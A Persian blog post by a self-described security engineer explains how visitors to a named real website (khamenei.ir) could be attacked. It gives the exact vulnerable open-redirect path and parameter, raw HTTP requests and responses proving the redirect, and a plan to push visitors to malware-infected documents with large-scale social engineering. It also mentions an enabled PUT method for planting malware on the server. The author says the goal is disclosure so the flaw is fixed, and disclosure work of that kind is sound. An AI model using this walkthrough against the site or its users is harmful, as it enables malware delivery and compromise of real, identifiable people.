کیوان
کیوان
خواندن ۶ دقیقه·۵ سال پیش

تشریح نحوه حمله به بازدیدکننده های وبسایت دفتر حفظ و نشر آثار مقام معظم رهبری

در این مقاله میخواهیم به یک موضوعی بپردازیم تحت عنوان اینکه چطور میتوان به بازدیدکننده های وبسایت حضرت آقا حمله سایبری انجام داد و در ادامه تمام مواردی که نیاز هست رو توضیح خواهیم داد. وبسایت حفظ و نشر آثار حضرت آقا به آدرس khamenei.ir میباشد که دارای Subdomain های مختلف برای زبان های متفاوت هست و کاربران فارسی زبان و انگلیسی زبان و حتی عربی زبان میتوانند به هرکدوم از Subdomain ها منتقل شوند و از مطالب وبسایت بهره مند شوند.

چرا در این مقاله روی موضوع حمله به کاربران بازدیدکننده بحث میکنیم؟

وبسایت مذکور یک وبسایت خبری و اطلاع رسانی هست و تفاوت مهمی با وبسایتی دارد که سرویس های متفاوت روی آن درحال اجراست و به شبکه داخلی وصل هست. وبسایت ها بطور کلی به دو دسته تقسیم بندی میشوند :

الف) وبسایت های خبری و اطلاع رسانی

ب) وبسایت هایی که سرویس های متفاوتی را پشتیبانی میکنند و به شبکه داخلی ای وصل هستند.

همچنین آسیب پذیری های ما به دو دسته کلی تقسیم بندی میشوند :

الف) آسیب پذیری های Server Side

ب) آسیب پذیری های Client Side

وبسایت هایی که جزو گروه ؛الف؛ هستند به دلیل اینکه جنبه اطلاع رسانی و خبری دارند بنابراین حملاتی که برای این نوع وبسایت ها مهم هستند حملات مبتنی بر آسیب پذیری های گروه ؛ب؛ هستند. البته شاید بتوان گفت میتوان این سایت ها را به اصطلاح Deface کرد اما deface کردن در برهه زمانی فعلی اهمیت چندانی ندارد و همچنین بحث ما روی موضوع نفوذ و سوءاستفاده هست که دیفیس با این اهداف هم راستا نخواهد بود. امروزه کمتر وبسایتی در دنیای سایبر وجود دارد که هم وبسایت خبری و جنبه اطلاع رسانی باشد و هم به یک شبکه داخلی متصل باشد و یا سرویس های متفاوتی را اجرا و سرویس دهی کند.هرچند سرور وبسایت میتواند مورد سوءاستفاده قرار بگیرد.

وبسایت های گروه ؛ب؛ نوع دیگری از وبسایت ها هستند که سرویس های متفاوت را ساپورت میکنند. بعنوان مثال وبسایتی وجود دارد که به یک دیتابیسی متصل هست و حتی برخی سرویس های مرتبط با شبکه داخلی را نیز ساپورت میکند.حملاتی که برای اینچنین وبسایت ها مهم و قابل توجه هستند حملات گروه ؛الف؛ هستند. نفوذگر با بررسی سرویس ها و روش های مختلف در ابعاد گوناگونی سعی خواهد داشت از سرور هدف کسب دسترسی کرده و حتی به شبکه داخلی متصل شود. در اینحالت پیاده سازی حملات تحت کلاینت برای اینچنین وبسایت ها شایع نیست و کم اهمیت است.

وبسایت حفظ و نشر آثار حضرت آقا جزو کدام وبسایت ها هست؟

وبسایت حضرت آقا را اگر بازدید کرده و مورد بررسی قرار دهید این نتیجه گیری ایجاد خواهد شد که وبسایت مذکور یک وبسایت با جنبه اطلاع رسانی هست. بنابراین ما روی موضوع نفوذ به بازدیدکننده های وبسایت تمرکز خواهیم کرد و در انتها بصورت مختصر به آسیب پذیری سمت سرور نیز اشاره ای خواهیم داشت.

رتبه و رنک وبسایت چگونه است؟

اکنون کمی رنک و رتبه وبسایت را مورد تحلیل قرار میدهیم.

همانطور که در تصویر پایین مشاهده میکنید کاربران وبسایت با استفاده از Keyword های همانند کلیدواژ های زیر به وبسایت khamenei.ir مراجعه میکنند :

چند وبسایت هم راستا با وبسایت حفظ نشر و آثار مقام معظم رهبری نیز وجود دارد که به شرح زیر هستند :

در حال حاضر بطور جامع کاربران بازدیدکننده وبسایت از کشورهای ایران و ایالات متحده آمریکا هستند که جزییات آن مطابق با تصویر زیر هست :

همانطور که مشاهده میکنید ۹۴٫۳ درصد از بازدیدکننده ها ایرانی هستند و ۳٫۶ درصد نیز کاربران آمریکایی را تشکیل میدهند.

رتبه وبسایت در دو کشور ایران و آمریکا نیز به شرح زیر هست :

توضیحات جامع برای نفوذ به بازدیدکننده های وبسایت :

باتوجه به ماهیت وبسایت و همچنین با توجه به اینکه اکثریت کاربران وبسایت را کاربران ایرانی تشکیل میدهند بنابراین وجود یک آسیب پذیری در وبسایت میتواند زمینه را فراهم بکند تا حملاتی سازماندهی شده علیه کاربران پیاده سازی شود.یک آسیب پذیری در پورتال کشف شده است که ما قصد داریم در ادامه در مورد آن بحث کنیم.

در خصوص کاربران بازدیدکننده میتوان تحلیل هایی داشت. بعنوان مثال میتوان این احتمال را بصورت قوی مطرح کرد که با توجه به ماهیت و زمینه فعالیتی وبسایت این احتمال بصورت قوی وجود دارد که عمده بازدیدکننده های وبسایت کاربران انقلابی و مقید به ارزش های انقلاب و رهبری و اعتقادی هستند بنابراین با این حساب طیف افراد مشخص است و زمینه برای نفوذ نیز مشخص است در نتیجه میتوان بصورت ساده تر حملاتی را سازماندهی کرد.آسیب پذیری که در سایت وجود دارد URL Injection هست و این امکان را به نفوذگر میدهد تا بتواند کاربر را بدون ایجاد کوچک ترین شک و تردید به آدرس دیگری هدایت بکند.بعنوان مثال میتوان استفتائات حضرت آقا را به یک بدافزار آلوده کرد و سپس برروی یک سرور دیگری قرار داد و از طریق این آسیب پذیری کاربران بازدیدکننده را به سمت این استفتائات آلوده شده هدایت کرد. دوستانی که در حوزه امنیت سایبری فعالیت دارند بهتر میتوانند این موارد را درک کنند.

سابدامین آسیب پذیر وبسایت بصورت زیر هست :

farsi.khamenei.ir

همچنین URL آسیب پذیر را به اینصورت داریم :

/redirect?c=f57cf9bb8e90d2b426cb&id=42671&u=

پارامتر u آسیب پذیر بوده و هنگامی که مقدار آن را بصورت (بعنوان مثال) زیر قرار میدهیم :

www.google.com

به آدرس google.com منتقل میشود. اکنون www.google.com میتواند با آدرس بدافزار ما جایگزین شود.

ابتدا درخواستی به سمت صفحه نخست وبسایت ارسال میکنیم :

GET / HTTP/1.1 Host: farsi.khamenei.ir Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: __utmz=4503204.1576828573.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=4503204.1770042313.1576828573.1576828573.1576851880.2; __utmc=4503204; JSESSIONID=BE90F65D9AF02814604E9309B5F43C54 Connection: close

خب حالا Response که برای ما برمیگردد بصورت زیر است :

HTTP/1.1 200 OK Date: Fri, 20 Dec 2019 16:15:02 GMT Server: Apache-Coyote/1.1 x-xss-protection: 1; mode=block x-frame-options: SAMEORIGIN X-Content-Type-Options: nosniff Cache-Control: private, max-age=180 Accept-Ranges: bytes ETag: W/&quot96431-1576788177000&quot Last-Modified: Thu, 19 Dec 2019 20:42:57 GMT Content-Type: text/html;charset=UTF-8 Access-Control-Allow-Origin: * Content-Secure-Policy: default-src 'none'; script-src 'self' www.google-analytics.com ajax.googleapis.com; img-src *; style-src 'self'; Vary: Accept-Encoding Content-Length: 96431 Connection: close

خب مشاهده میکنید که روال عادی هستش.

حالا به url آسیب پذیر یک درخاستی ارسال میکنیم :

GET /redirect?c=f57cf9bb8e90d2b426cb&id=42671&u=//www.google.com HTTP/1.1 Host: farsi.khamenei.ir Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: __utmz=4503204.1576828573.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=4503204.1770042313.1576828573.1576828573.1576851880.2; __utmc=4503204; JSESSIONID=BE90F65D9AF02814604E9309B5F43C54 Connection: close

اکنون Response دریافتی ما متفاوت خواهد بود :

HTTP/1.1 302 Found Date: Fri, 20 Dec 2019 16:18:40 GMT Server: Apache-Coyote/1.1 x-xss-protection: 1; mode=block x-frame-options: SAMEORIGIN X-Content-Type-Options: nosniff Cache-Control: private, max-age=180 Location: http://www.google.com Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=F9ED1D537E1A4AD68FBE79E8CB3C75C7; Path=/; HttpOnly Access-Control-Allow-Origin: * Content-Secure-Policy: default-src 'none'; script-src 'self' www.google-analytics.com ajax.googleapis.com; img-src *; style-src 'self'; Vary: Accept-Encoding Content-Length: 0 Connection: close

پس آسیب پذیری مان در حالت کلی درست هست و بنابراین میتوانیم برروی مرورگر نیز این موضوع را امتحان کنیم.

معمولا نفوذگران دو هدف کلی برای این آسیب پذیری را دارند :

۱) هدایت کاربران به سمت URL های آلوده

۲) هدایت کاربران به سمت بدافزار خودشان جهت آپلود در سیستم قربانی

بنده دو demo آماده کرده ام که میتوانید دریافت و مشاهده نمایید :

دمو شماره یک

دمو شماره دو

لینک ویدیو یوتیوب


بررسی سمت سرور از لحاظ امنیتی :

هدف اصلی ما در این مقاله بررسی این موضوع بود که چطور میتوان از طریق آسیب پذیری که در سایت قرار دارد بتوان به بازدیدکننده های وبسایت حمله سایبری ایجاد کرد. البته انجام اینکار برای اینکه خروجی مطلوبی داشته باشد نیازمند سازماندهی کردن هست و بعنوان مثال بایستی از روش های مختلف Social Engineering در ابعاد بزرگ نیز بهره گرفت. اما سرور سایت نیز دارای آسیب پذیری هست و امن نیست.

همانطور که در تصویر بالا مشاهده میکنید Put Method روی Webserver درحال فعال هست و وجود این متد در وب سرور باعث میشود نفوذگر بدافزارهای خود را برروی سرور هدف بارگزاری کند. اینکار نیز روش های خاص خود را دارد که ما در این مقاله به این موضوع نمیپردازیم.

حرف های پایانی :

بهره گیری از آسیب پذیری ها نیازمند این است که از جنبه های مختلف به یک هدف و آسیب پذیری نگاه کنیم.حملات Client Side برای اهداف مختلف میتوانند استفاده شوند بعنوان مثال میتوان از کاربران بعنوان زامبی استفاده کرد و در راستای اهداف شوم از آنان سوءاستفاده کرد بنابراین داشتن طرز فکر مناسب در این حوزه و نگاه به جنبه های متفاوت یک حرکت و آسیب پذیری میتواند خیلی موثر باشد.

هدف بنده از به اشتراک گذاری این موضوع اینست که امیدوارم به سمع و نظر پشتیبانی وبسایت برسد و این آسیب پذیری که میتواند بصورت سازماندهی شده مورد سوءاستفاده قرار بگیرد نیز برطرف گردد.


یاعلی مدد

مهندس امنیت شبکه
شاید از این پست‌ها خوشتان بیاید